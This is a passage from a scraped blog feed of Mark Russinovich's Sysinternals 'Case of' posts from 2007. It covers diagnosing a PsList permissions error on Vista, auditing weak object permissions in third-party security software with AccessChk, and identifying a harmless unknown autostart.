simple case, Explorer opened the target ZIP file 14 times, 12 of those before it had actually created the file and therefore with NOT FOUND results, and performed directory look ups of the target 19 times. It was also redundant with the source file, opening it 28 times and querying the file’s basic properties 17 times. It’s not like Explorer doesn’t give eTrust plenty of opportunities to cause sharing problems. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> In order to verify that Explorer itself was at fault, and not some third-party extension, I looked at the stacks of various events by selecting the event and typing Ctrl+K to open the event properties dialog to the stack page: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="191" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1702286/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1702286/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120982iB02A34183B112719" style="WIDTH: 550px; HEIGHT: 191px" width="550" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Zipfldr.dll, the Explorer file compression DLL, was in most of the stack traces, meaning that&nbsp;the compression engine itself was ultimately responsible for the waste. Further, the number of repetitious operations explodes when you compress multiple files. There are clearly easy ways to improve the algorithm, so hopefully we’ll see a more efficient compression engine in Windows 7. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <EM> Update: I've learned that the compression engine has been updated in Vista SP1 to perform fewer file operations. </EM> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> On a closing note, if you’d like to catch me at my next public speaking engagement, come to </FONT> <A href="#" target="_blank"> <FONT face="Calibri" size="3"> Wintellect’s Devscovery </FONT> </A> <FONT face="Calibri" size="3"> conference in Redmond, August 14-16, where I’m delivering a keynote on Vista kernel changes. </FONT> </P> </BODY></HTML> Thu, 27 Jun 2019 06:34:16 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-failed-file-compression/ba-p/723585 MarkRussinovich 2019-06-27T06:34:16Z The Case of the Unexpected PsList Error https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-unexpected-pslist-error/ba-p/723574 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Jul 05, 2007 </STRONG> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Not long after I deployed Windows Vista on my main desktop system I noticed that a process became unresponsive and appeared to be consuming excessive amounts of CPU. I had a command prompt handy, so I ran </FONT> <A href="#" target="_blank"> <FONT face="Calibri" size="3"> PsList </FONT> </A> <FONT face="Calibri" size="3"> to dump detailed information about the process as one of my troubleshooting steps. Instead of reporting apage full of statistics like I expected, however, PsList printed its banner, an error message, and exited: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-spacerun: yes"> <FONT face="Calibri" size="3"> </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="178" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1449287/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1449287/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120970i9D451B8D46D1919A" style="WIDTH: 550px; HEIGHT: 178px" width="550" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> PsList obtains information from the system performance counters, which an application accesses using standard Registry functions directed at the virtual HKEY_PERFORMANCE_DATA key, so the message indicated that PsList was unable to query the virtual performance keys. When you point PsList at a remote system and don’t have administrative rights on that system, or the system isn’t running the Remote Registry service, then PsList reports the same error, but I had never seen the message when using PsList to look at a local system. Something was different about Windows Vista and I set out to learn what. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Putting my original troubleshooting mission on hold, I launched </FONT> <A href="#" target="_blank"> <FONT face="Calibri" size="3"> Process Monitor </FONT> </A> <FONT face="Calibri" size="3"> and repeated the PsList command with Process Monitor looking on. I didn’t have a firm expectation that it would reveal the cause of the problem, but experience has taught me that Process Monitor (and its predecessors Filemon and Regmon) often solves seemingly unexplainable problems like this. I scanned the trace looking for anomalous error codes, because when they’re present they almost always point to the source of a problem, and found an access denied error: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <IMG height="73" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1449289/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1449289/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120971i50AAED5CD7998CE4" style="WIDTH: 566px; HEIGHT: 73px" width="566" /> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> For some reason, PsList, running as a standard user because I hadn’t elevated the command prompt from which I ran it, was unable to open the PerfLib registry key for read access. I was perplexed because on Windows XP I had been able to run PsList as a standard user. I launched Regedit, navigated to the key, and viewed its permissions. As I suspected, standard users aren’t members of any of the groups the permissions grant access (note the presence of two new performance-related groups, Performance Log&nbsp;Users and Performance Monitor Users): </FONT> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-spacerun: yes"> <FONT face="Calibri" size="3"> <IMG height="275" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1449291/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1449291/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120972iA9629C63B38CEF16" style="WIDTH: 550px; HEIGHT: 275px" width="550" /> </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I quickly confirmed that to be the reason for PsList’s failure by granting the Interactive Users group read access to the key and verifying that PsList subsequently worked. Now I was left with the question of what permissions Windows XP assigns the key. I switched to a Windows XP test system and viewed the key’s permissions. Sure enough, Interactive Users have read access, explaining why PsList works as a&nbsp;standard user on Windows XP systems: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <IMG height="224" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1449294/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1449294/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120973i50A86F1AC2774CF2" style="WIDTH: 530px; HEIGHT: 224px" width="530" /> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I then pondered the reason for the change. I suspected the new permissions close an information disclosure hole, but after some thought I concluded that they aren’t closing any hole. </FONT> <FONT face="Calibri" size="3"> The PerfLib key is where performance providers register their counters and DLLs, so when a tool like PsList queries a counter the performance API loads the associated DLL into the querying process and calls functions in the DLL that return the desired data. Because the DLLs execute in the context of the process into which they load, they can’t implement security that can’t be easily circumvented by the process. It’s therefore the responsibility of a performance data source, which might be the kernel or an application like Internet Information Server (IIS), to prevent unauthorized access to its performance data. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Preventing read access to the PerfLib key is therefore the equivalent of having a performance DLL implement security. While locking down the key prevents the performance API from determining what counters are available and what DLLs provide performance data, with the exception of add-on applications, the core registrations are constant from system to system. That means that a process can circumvent any protection the locked-down key is attempting to provide by directly loading performance DLLs and calling their data functions. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> To make a long story short, I filed a bug against Windows Vista Service Pack 1 (SP1) and Windows Server 2008 to have Interactive Users added back to PerfLib’s permissions. The reliability and diagnostics team reported back that the permissions changed inadvertently during the release of Windows Server 2003, but I convinced them it didn’t make sense, so&nbsp;in SP1 and Windows Server 2008 you won’t need to edit PerfLib’s permissions to be able to run tools like PsList as a standard user. </FONT> </P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> </P><P> <FONT face="Calibri" size="3"> Another case closed by Process Monitor! </FONT> </P> <P></P> </BODY></HTML> Thu, 27 Jun 2019 06:33:12 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-unexpected-pslist-error/ba-p/723574 MarkRussinovich 2019-06-27T06:33:12Z The Case of the Insecure Security Software https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-insecure-security-software/ba-p/723569 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Jun 15, 2007 </STRONG> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> A little over a year ago I set out to determine exactly why, prior to Window Vista, the Power Users security group was considered by most to be the equivalent of the Administrators group. I knew the answer lay in the fact that default Windows permissions allow the group to modify specific Registry keys and files <SPAN style="mso-spacerun: yes"> </SPAN> that <SPAN style="mso-spacerun: yes"> </SPAN> enable members of the group to elevate their privileges to that of the Local System or Administrators group, but I didn’t know of any concrete examples. I could have manually investigated the security on every file, directory and Registry key, but instead decided to write a utility, <A class="" href="#" mce_href="#" target="_blank"> AccessChk </A> , that would answer questions like this automatically. AccessChk quickly showed me directories, files, keys, and even Windows services written by third parties, that Power Users could modify to cause an elevation of privilege. I posted my findings in my blog post <A class="" href="#" mce_href="#" target="_blank"> The Power in Power Users </A> . </FONT> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Since the posting, AccessChk has grown in popularity as a system security auditing tool that helps identify weak permissions problems. I’ve recently received requests from groups within Microsoft and elsewhere to extend its coverage of securable objects analyzed to include the Object Manager namespace (which stores named mutexes, semaphores and memory-mapped files), the Service Control Manager, and named pipes. </FONT> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> When I revisited the tool to add this support, I reran some of the same queries I had performed when I wrote the blog post, like seeing what system-global objects the Everyone and Users groups can modify. <SPAN style="mso-spacerun: yes"> </SPAN> The ability to change those objects almost always indicates the ability for unprivileged users to compromise other accounts, elevate to system or administrative privilege, or prevent services or programs run by the system or other users from functioning. For example, if an unprivileged user can change an executable in the %programfiles% directory they might be able to cause another user to execute their code. Some applications include Windows services, so if a user could change the service executable they could obtain system privileges. </FONT> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> These local elevation-of-privilege and denial-of-service holes are unimportant on single-user systems where the user is an administrator, but on systems where a user expects to be secure when running as a standard user (like Windows Vista), and on shared computers like a family PCs that have unprivileged accounts, Terminal Server systems, and kiosk computers, they break down the security boundaries that Windows provides to separate unprivileged users from each other and from the system. <SPAN style="mso-spacerun: yes"> </SPAN> </FONT> </FONT> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> In my testing I executed AccessChk commands to look for potential security issues in each of the namespaces it supports. In the commands below, the -s option has AccessChk recurse a namespace, -w has it list only the objects for which the specified group – Everyone in the examples – has write access, and -u directs AccessChk to not report errors when it can’t query objects for which your account lacks permissions. The other switches indicate what namespace to examine, where the default is the file system. </FONT> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt 0.5in"> <FONT size="3"> <FONT face="Calibri"> File system: <SPAN style="mso-tab-count: 1"> </SPAN> <SPAN style="mso-tab-count: 1"> </SPAN> </FONT> <SPAN style="FONT-FAMILY: Courier"> accesschk everyone -wsu </SPAN> <SPAN style="mso-ascii-font-family: Courier"> <FONT face="Calibri"> “ </FONT> </SPAN> <SPAN style="FONT-FAMILY: Courier"> %programfiles% </SPAN> <SPAN style="mso-ascii-font-family: Courier"> <FONT face="Calibri"> ” </FONT> </SPAN> </FONT> <SPAN style="FONT-FAMILY: Courier; mso-hansi-font-family: Calibri; mso-hansi-theme-font: minor-latin"> <BR /> </SPAN> <FONT size="3"> <FONT face="Calibri"> File system: <SPAN style="mso-tab-count: 1"> </SPAN> <SPAN style="mso-tab-count: 1"> </SPAN> </FONT> <SPAN style="FONT-FAMILY: Courier"> accesschk everyone -wsu </SPAN> <SPAN style="mso-ascii-font-family: Courier"> <FONT face="Calibri"> “ </FONT> </SPAN> <SPAN style="FONT-FAMILY: Courier"> %systemroot% </SPAN> <SPAN style="mso-ascii-font-family: Courier"> <FONT face="Calibri"> ” </FONT> </SPAN> </FONT> <SPAN style="FONT-FAMILY: Courier; mso-hansi-font-family: Calibri; mso-hansi-theme-font: minor-latin"> <BR /> </SPAN> <FONT face="Calibri"> <FONT size="3"> Registry: <SPAN style="mso-tab-count: 1"> </SPAN> <SPAN style="mso-tab-count: 1"> </SPAN> </FONT> </FONT> <FONT size="3"> <SPAN style="FONT-FAMILY: Courier"> accesschk everyone -kwsu hklm <BR /> </SPAN> <FONT face="Calibri"> Processes: <SPAN style="mso-tab-count: 1"> </SPAN> <SPAN style="mso-tab-count: 1"> </SPAN> </FONT> </FONT> <FONT size="3"> <SPAN style="FONT-FAMILY: Courier"> accesschk everyone -pwu * <BR /> </SPAN> <FONT face="Calibri"> Named Objects: <SPAN style="mso-tab-count: 1"> </SPAN> </FONT> </FONT> <FONT size="3"> <SPAN style="FONT-FAMILY: Courier"> accesschk everyone -owu basenamedobjects <BR /> </SPAN> <FONT face="Calibri"> Services: <SPAN style="mso-tab-count: 2"> </SPAN> </FONT> <SPAN style="FONT-FAMILY: Courier"> accesschk everyone -cwu * </SPAN></FONT></P><P> </P> <P></P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I ran similar commands looking for write access from the Authenticated Users and Users groups. An output line, which looks like “RW C:Program FilesVendor”, reveals a probable security flaw. </FONT> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> To my surprise and dismay, I found security holes in several namespaces. The security settings on one application’s global synchronization and memory mapping objects, as well as on its installation directory, allow unprivileged users to effectively shut off the application, corrupt its configuration files, and replace its executables to elevate to Local System privileges. What application has such grossly insecure permissions? Ironically, that of a top-tier security vendor. </FONT> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> For instance, AccessChk showed output that indicated the Users group has write access to the application’s configuration directory (note that names have been changed): </FONT> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <SPAN style="FONT-FAMILY: Courier"> RW C:Program FilesSecurityVendorConfig <BR /> RW C:Program Files SecurityVendorConfigscanmaster.db <BR /> RW C:Program Files SecurityVendorConfigrealtimemaster.db <BR /> </SPAN> <FONT face="Calibri"> <SPAN style="mso-ascii-font-family: Courier"> … </SPAN> <SPAN style="FONT-FAMILY: Courier"> </SPAN></FONT></FONT></P><P> </P> <P></P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Because Malware would run in the Users group, it could modify the configuration data or create its own version and prevent the security software from changing it. It could also watch for dynamic updates to the files and reset their contents. </FONT> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> For the object namespace, it reported output lines like this: </FONT> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <SPAN style="FONT-FAMILY: Courier"> RW [Section] <SPAN style="mso-spacerun: yes"> </SPAN> basenamedobjects12345678-abcd-1234-cdef-123456789abc <BR /> RW [Mutant] <SPAN style="mso-spacerun: yes"> </SPAN> basenamedobjects87654321-cdab-3124-efcd-6789abc12345 <BR /> </SPAN> <FONT face="Calibri"> <SPAN style="mso-ascii-font-family: Courier"> … </SPAN> <SPAN style="FONT-FAMILY: Courier"> </SPAN></FONT></FONT></P><P> </P> <P></P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I executed handle searches in <A class="" href="#" mce_href="#" target="_blank"> Process Explorer </A> to determine which processes had these objects open and it reported those of the security software. Sections represent shared memory so it was likely that the security agent,&nbsp;running in user login sessions, was using it to communicate data to the security software’s service process that was running in the Local System account. Malware could therefore modify the contents of the memory, possibly triggering a bug in the service to that might allow the malware to obtain administrative rights. At the minimum it could manipulate the data to foil the communication. </FONT> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> “Mutant” is the internal name for Windows mutexes, and the security software’s service was using the mutex for synchronization. That means that malware could acquire the mutex and block forward progress by the service. There were more than few of these objects with wide-open security that could potentially be used to compromise or disable the security software. </FONT> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> In the wake of my discovery, I analyzed the rest of my systems, as well as trial versions of other popular security, game, ISP and consumer applications. A number of the most popular in each category had problems similar to those of the security software installed on my development system. I felt like I was shining a flashlight under a house and finding rotten beams where I had assumed there was a sturdy foundation. The security research community has focused its efforts uncovering local elevations via buffer overflows and unverified parameters, but has completely overlooked these obvious problems – problems often caused by the software of security ISVs, or in some cases, their own. </FONT> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Why are these holes created? I can only speculate, but because allowing unprivileged groups write-access to global objects requires explicit override of secure defaults, my guess is that they are common in software that was originally written for Windows 9x or assumed a single administrative user. When faced with permissions issues that crop up when migrating to a version of Windows with security, or that occur when their software is run by standard user accounts, the software developers have taken the easy way out and essentially turned off security. </FONT> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Regardless of the reason, it’s time for software vendors – especially those of security applications - to secure their software. If you discover insecure software on your system please file a bug with the publisher, and if you are a software developer please follow the guidance in " <A class="" href="#" mce_href="#" target="_blank"> Writing Secure Code </A> ,” by Michael Howard and David LeBlanc. </FONT> </P> <BR /> </BODY></HTML> Thu, 27 Jun 2019 06:32:42 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-insecure-security-software/ba-p/723569 MarkRussinovich 2019-06-27T06:32:42Z The Case of the Unknown Autostart https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-unknown-autostart/ba-p/723568 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on May 21, 2007 </STRONG> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> A few weeks ago I installed an update to a popular Internet Explorer media-player ActiveX control on one of my systems. I knew from past experience that the plugin’s updates always configure an autostart, (an executable configured to automatically launch during boot, login or with another process) that I don’t believe serves any useful purpose, so as I had in the past, I launched Sysinternals <A class="" href="#" mce_href="#" target="_blank"> Autoruns </A> , set both Verify Code Signatures and Hide Signed Microsoft Entries in the options menu, pressed Refresh, found the autostart and deleted it. However, as I was about to close the window another entry caught my eye and caused my heart to stop: </FONT> </P> <BR /> <P class="MsoNormal" mce_keep="true" style="MARGIN: 0in 0in 10pt"> <IMG height="307" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1010598/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1010598/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120968i56D0617737126E46" style="WIDTH: 591px; HEIGHT: 307px" width="591" /> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> <SHAPETYPE coordsize="21600,21600" filled="f" id="_x0000_t75" preferrelative="t" spt="75" path="m@4@5l@4@11@9@11@9@5xe" stroked="f"> <STROKE joinstyle="miter"> </STROKE> <FORMULAS> <F eqn="if lineDrawn pixelLineWidth 0"> </F> <F eqn="sum @0 1 0"> </F> <F eqn="sum 0 0 @1"> </F> <F eqn="prod @2 1 2"> </F> <F eqn="prod @3 21600 pixelWidth"> </F> <F eqn="prod @3 21600 pixelHeight"> </F> <F eqn="sum @0 0 1"> </F> <F eqn="prod @6 1 2"> </F> <F eqn="prod @7 21600 pixelWidth"> </F> <F eqn="sum @8 21600 0"> </F> <F eqn="prod @7 21600 pixelHeight"> </F> <F eqn="sum @10 21600 0"> </F> </FORMULAS> <PATH gradientshapeok="t" connecttype="rect" extrusionok="f"> </PATH> <LOCK aspectratio="t" ext="edit"> </LOCK> </SHAPETYPE> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The entry, IECheck, has all the characteristics of malware: it has no icon, description, or company name, and it’s located in the Windows directory. Further, Autoruns’ Search Online feature, which executes a Web search, yielded no information on the suspicious executable. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I needed to investigate further to determine if the entry was a sign of a malware infection, so I turned to the Sysinternals <A class="" href="#" mce_href="#" target="_blank"> Strings </A> utility. Image files often contain plain-text strings that contain clues that can connect it with an application. For example, if a program reads configuration information from the registry, the registry path is embedded in the executable and usually includes the name of the vendor or application. Strings scans a file for printable strings (both Unicode and Ascii) and prints them, so my next step was to open a command prompt and dump those in IECheck.exe. Sometimes the output is so verbose that it’s easier to pipe the output to a text file and study the results with Notepad, but this time I spotted some interesting text as it scrolled past: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <IMG height="277" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1010603/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1010603/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120969iD7D023332E3AA99C" style="WIDTH: 394px; HEIGHT: 277px" width="394" /> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Sure enough, the executable had string references to other executables that are probably part of the same application, and they revealed the name of the application, IconEdit2, as well the vendor, <A class="" href="#" mce_href="#" target="_blank"> WinAppsPlanet </A> . <SPAN style="mso-spacerun: yes"> </SPAN> I then remembered that I had just downloaded IconEdit a few days earlier to edit hi-resolution Vista-style icons and so I was able to classify the incident as a false alarm and close the case. My heart returned to its normal rhythm. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> This example highlights a few practices that software vendors should follow for reliability and to prevent the confusion I faced. <SPAN style="mso-spacerun: yes"> </SPAN> First is the use of environment variables and Shell special paths instead of hard-coded strings. IECheck (which I presume stands for Icon Editor Check) references the Program Files directory by name, which is only valid on English installations of Windows, so if installed on a foreign system, IECheck would fail to find the executables it looks for. Instead, it should locate the Program Files directory by using the %PROGRAMFILES% environment variable, or call ShGetFolderPath with <SPAN style="FONT-SIZE: 11pt; FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-fareast-font-family: Calibri; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin; mso-bidi-font-family: 'Times New Roman'; mso-bidi-theme-font: minor-bidi; mso-ansi-language: EN-US; mso-fareast-language: EN-US; mso-bidi-language: AR-SA"> CSIDL_PROGRAM_FILES </SPAN> for the folder parameter. <SPAN style="mso-spacerun: yes"> </SPAN> </FONT> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> To avoid scaring security-conscious users, all executables should have a version resource with a company name and a description that clearly identifies the executable’s purpose. Further, vendors should obtain a code signing certificate to digitally sign their code. <SPAN style="mso-spacerun: yes"> </SPAN> Windows relies more and more on signature information to help users make trust decisions, and users can leverage tools like <A class="" href="#" mce_href="#" target="_blank"> Process Explorer </A> , Autoruns, and <A class="" href="#" mce_href="#" target="_blank"> Sigcheck </A> to verify that executables are what they advertise instead of malware. I’ve contacted the author of IconEdit2 and he’ll be updating his application to follow this guidance. All vendors need to do their part to avoid this kind of needless scare. </FONT> </P> </BODY></HTML> Thu, 27 Jun 2019 06:32:37 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-unknown-autostart/ba-p/723568 MarkRussinovich 2019-06-27T06:32:37Z WinHEC, TechEd and MSDRT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/winhec-teched-and-msdrt/ba-p/723565 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on May 10, 2007 </STRONG> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt; mso-margin-bottom-alt: auto"> <FONT size="3"> <FONT face="Calibri"> I love speaking at conferences. They provide great opportunities to share information, meet interesting people, hear the concerns and desires of people out in the real world, and see things from a different perspective. I’ve actually been remiss posting all my public appearances on Sysinternals. Some of my recent appearances included Microsoft’s TechReady conference in February, <A class="" href="#" mce_href="#" target="_blank"> CanSecWest </A> in Vancouver a few weeks ago and <A class="" href="#" mce_href="#" target="_blank"> EUSecWest </A> in London on March 2. </FONT> </FONT> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt; mso-margin-bottom-alt: auto"> <FONT size="3"> <FONT face="Calibri"> My next appearance will be my first keynote at a Microsoft conference, which is very exciting for me. It’s at the <A class="" href="#" mce_href="#" target="_blank"> Microsoft Windows Hardware Engineering Conference </A> (WinHEC)&nbsp;on May 15 and 16 in Los Angeles. Mine is one of <A class="" href="#" mce_href="#" target="_blank"> several keynotes </A> that include&nbsp;Bill Gates and Craig Mundie presenting on the first day and me on the second day. </FONT> </FONT> <FONT size="3"> <FONT face="Calibri"> My talk, <I style="mso-bidi-font-style: normal"> Windows Server Platform Internals </I> , is more technical than your average keynote and is a bit of an experiment for the conference. The session will be a lot of fun with a bunch of demos, but because I only have an hour it will also be challenging because I have over three hours of material from which I have to pull highlights to fit. </FONT></FONT></P><P> </P> <P></P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt; mso-margin-bottom-alt: auto"> <FONT size="3"> <FONT face="Calibri"> I’m also speaking again at <A class="" href="#" mce_href="#" target="_blank"> TechEd US </A> in Orlando. The conference is the week of June 4, but my <A class="" href="#" mce_href="#" target="_blank"> four sessions </A> are all on the last two days. </FONT></FONT></P><P> </P> <P></P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt; mso-margin-bottom-alt: auto"> <FONT size="3"> <FONT face="Calibri"> Finally, if you happened to miss it, check out my first <A class="" href="#" mce_href="#" target="_blank"> Channel 9 interview </A> , where I talk about life at Microsoft, how Sysinternals got started, Windows Vista and UAC. </FONT></FONT></P><P> </P> <P></P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt; mso-margin-bottom-alt: auto"> <FONT size="3"> <FONT face="Calibri"> Speaking of how Sysinternals&nbsp;got started, the Winternals Administrator’s Pak, with ERD Commander at the core, has debuted in its Microsoft form as the Microsoft Diagnostics and Repair Toolkit (unfortunately, my technical position gives me no influence over product names). The toolkit is included in the Microsoft Desktop Optimization Pack (MDOP), which is available for purchase through Microsoft’s Software Assurance program, and you can download the <A class="" href="#" mce_href="#" target="_blank"> 30-day trial version </A> from the Microsoft download center. </FONT> </FONT> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt; mso-margin-bottom-alt: auto"> <FONT size="3"> <FONT face="Calibri"> I hope to see you at one of my sessions! </FONT></FONT></P><P> </P> <P></P> <P mce_keep="true"> </P> <BR /> </BODY></HTML> Thu, 27 Jun 2019 06:32:20 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/winhec-teched-and-msdrt/ba-p/723565 MarkRussinovich 2019-06-27T06:32:20Z Botnets by Email https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/botnets-by-email/ba-p/723559 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Apr 09, 2007 </STRONG> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> I make no effort to hide my email address, which means that I know the instant a new email-based virus, phishing attack, or penny-stock-pumping scam launches when my inbox floods. Most such emails are easy to distinguish from legitimate emails because of their lack of personalization, poor grammar, or low-quality images that attempt to foil spam filters. On occasion, however, I get a message that causes me to examine it a little more closely in order to make sure it’s junk. I also look out for ones that might trick unsophisticated users. </FONT></FONT></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> My family uses <A class="" href="#" mce_href="#" target="_blank"> BlueMountain greetings </A> </FONT> <FONT size="3"> <FONT face="Calibri"> to send eCards, so when I received this email I took a second look: </FONT> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> <IMG height="452" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/741364/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/741364/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120962i9CEE266D67A81402" style="WIDTH: 500px; HEIGHT: 452px" width="500" /> </FONT></FONT></P><P> </P> <P></P> <BR /> <P class="MsoNormal" 